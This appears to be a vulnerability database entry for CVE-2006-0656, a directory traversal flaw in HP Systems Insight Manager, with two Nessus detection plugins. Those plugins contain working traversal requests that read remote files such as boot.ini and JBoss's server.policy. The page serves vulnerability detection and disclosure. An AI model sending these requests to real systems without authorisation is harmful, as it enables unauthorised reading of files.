Vulnerabilities > CVE-2006-0656 - Directory Traversal vulnerability in HP Systems Insight Manager 4.2/5.0
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
NONE Availability impact
NONE Summary
Directory traversal vulnerability in HP Systems Insight Manager 4.2 through 5.0 SP3 for Windows allows remote attackers to access arbitrary files via unspecified vectors, a different vulnerability than CVE-2005-2006.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 7 |
Nessus
NASL family CGI abuses NASL id JBOSS_CONFIG_DISCLOSURE.NASL description The remote JBoss server is vulnerable to an information disclosure flaw that could allow an attacker to retrieve the physical path of the server installation, its security policy, or to guess its exact version number. An attacker may use this flaw to gain more information about the remote configuration. last seen 2020-06-01 modified 2020-06-02 plugin id 18526 published 2005-06-18 reporter This script is Copyright (C) 2005-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/18526 title JBoss org.jboss.web.WebServer Class Multiple Vulnerabilities (Source Disc, ID) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if(description) { script_id(18526); script_cve_id("CVE-2005-2006", "CVE-2006-0656"); script_bugtraq_id(13985, 16571); script_version("1.21"); script_name(english:"JBoss org.jboss.web.WebServer Class Multiple Vulnerabilities (Source Disc, ID)"); script_set_attribute(attribute:"synopsis", value: "The remote web server is affected by an information disclosure flaw." ); script_set_attribute(attribute:"description", value: "The remote JBoss server is vulnerable to an information disclosure flaw that could allow an attacker to retrieve the physical path of the server installation, its security policy, or to guess its exact version number. An attacker may use this flaw to gain more information about the remote configuration." ); script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=111911095424496&w=2" ); script_set_attribute(attribute:"see_also", value:"http://www.securityfocus.com/advisories/10104" ); script_set_attribute(attribute:"solution", value: "Upgrade to JBoss 3.2.8 or 4.0.3. Or edit JBoss' 'jboss-service.xml' configuration file, set 'DownloadServerClasses' to 'false', and restart the server." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"d2_elliot_name", value:"RedHat JBoss File Disclosure"); script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true"); script_set_attribute(attribute:"plugin_publication_date", value: "2005/06/18"); script_set_attribute(attribute:"vuln_publication_date", value: "2005/06/17"); script_cvs_date("Date: 2018/11/15 20:50:17"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe",value:"cpe:/a:jboss:jboss"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_end_attributes(); summary["english"] = "Attempts to read security policy of a remote JBoss server"; script_summary(english:summary["english"]); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc."); script_family(english: "CGI abuses"); script_dependencie("http_version.nasl"); script_require_ports("Services/www", 8083, 50013); exit(0); } # Check starts here include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); ports = get_kb_list("Services/www"); ports = add_port_in_list(list:ports, port:8083); ports = add_port_in_list(list:ports, port:50013); foreach port (ports) { if (get_port_state(port)) { r = http_send_recv3(port:port, method: 'GET', item: "%."); if (! isnull(r) && ereg(pattern:"^HTTP/.* 400 (/|[A-Za-z]:\\)", string:r[0])) { file = "server.policy"; r = http_send_recv3(method: 'GET', item:"%"+file, port:port); if (!isnull(r) && "JBoss Security Policy" >< r[2]) { report = string( "Here are the contents of the file '", file, "' that\n", "Nessus was able to read from the remote host :\n", "\n", r[2] ); security_warning(port:port, extra:report); } } } }
NASL family CGI abuses NASL id HPSIM_NAMAZU_LANG_DIR_TRAVERSAL.NASL description The remote host appears to be running HP Systems Insight Manager (SIM), a unified infrastructure management tool. The version of HP SIM on the remote host includes a version of the search engine Namazu that reportedly fails to validate user input to the last seen 2020-06-01 modified 2020-06-02 plugin id 20893 published 2006-02-13 reporter This script is Copyright (C) 2006-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/20893 title HP Systems Insight Manager Namazu lang Parameter Traversal Arbitrary File Access code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(20893); script_version("1.22"); script_cve_id("CVE-2006-0656"); script_bugtraq_id(16571); script_name(english:"HP Systems Insight Manager Namazu lang Parameter Traversal Arbitrary File Access"); script_summary(english:"Checks for Namazu lang parameter directory traversal vulnerability in HP Systems Insight Manager"); script_set_attribute(attribute:"synopsis", value: "The remote web server contains a CGI script that is affected by a directory traversal flaw." ); script_set_attribute(attribute:"description", value: "The remote host appears to be running HP Systems Insight Manager (SIM), a unified infrastructure management tool. The version of HP SIM on the remote host includes a version of the search engine Namazu that reportedly fails to validate user input to the 'lang' parameter of the 'namazucgi' script. An unauthenticated attacker may be able to exploit this issue to access files on the remote host via directory traversal." ); script_set_attribute(attribute:"see_also", value:"http://www.securityfocus.com/advisories/10104" ); script_set_attribute(attribute:"solution", value: "Update HP SIM's .namazurc configuration file according to the vendor advisory." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_publication_date", value: "2006/02/13"); script_set_attribute(attribute:"vuln_publication_date", value: "2006/02/09"); script_set_attribute(attribute:"patch_publication_date", value: "2006/02/07"); script_cvs_date("Date: 2018/06/13 18:56:27"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:systems_insight_manager"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc."); script_dependencies("http_version.nasl", "web_traversal.nasl"); script_require_ports("Services/www", 50000, 50001); exit(0); } include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); port = get_http_port(default:50000); if ( get_kb_item(strcat("www/", port, "/generic_traversal"))) exit(0); # Try to exploit the flaw to read a file. file = "/../../../../../../../../../../../../../boot.ini"; url = string( "/mxhelp/cgi-bin/namazucgi?", "lang=", file ); r = http_send_recv3(method: "GET", port:port, item: url); if (isnull(r)) exit(0); res = r[2]; # There's a problem if looks like boot.ini. if ("[boot loader]">< res) { contents = res - strstr(res, "<h2>Results:"); if (isnull(contents)) report = desc; else { report = string( "Here are the contents of the file '\\boot.ini' that\n", "Nessus was able to read from the remote host \n", " by reading ", build_url(port: port, qs: url), " : \n", "\n", contents ); } security_warning(port:port, extra:report); }